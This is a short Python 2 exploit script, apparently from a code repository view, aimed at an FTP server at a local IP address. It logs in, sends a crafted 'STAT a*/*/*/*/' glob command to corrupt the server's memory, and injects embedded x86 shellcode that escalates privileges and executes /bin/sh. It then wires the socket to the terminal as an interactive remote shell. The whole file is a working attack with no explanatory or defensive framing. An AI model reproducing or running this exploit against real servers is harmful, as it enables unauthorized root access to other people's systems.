blob: 86ec3cca16a104a63f2eb9d93889890a8531e29a (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
#!/usr/bin/env python
from ftplib import *
import os,time,struct,sys
from select import select
shellcode = '\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xc0\x50\x50\x50\xb0\x7f\xcd\x80\xeb\x17\x31\xc0\x5b\x50\x88\x43\x07\x8d\x4b\x08\x89\x5b\x08\x89\x43\x0c\x51\x53\x50\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh\x0a'
ftp = FTP()
ftp.connect('192.168.1.2',21)
ftp.login('username','password')
time.sleep(6)
print 'sending stat command'
ftp.putcmd('STAT a*/*/*/*/')
print 'sending shellcode'
ftp.sock.send(shellcode)
time.sleep(2)
while 1:
heh = select([sys.stdin,ftp.sock],[],[])
for i in heh[0]:
if i == sys.stdin:
buf = sys.stdin.readline()
ftp.sock.send(buf)
if i == ftp.sock:
buf = ftp.sock.recv(1024)
sys.stdout.write(buf)
|
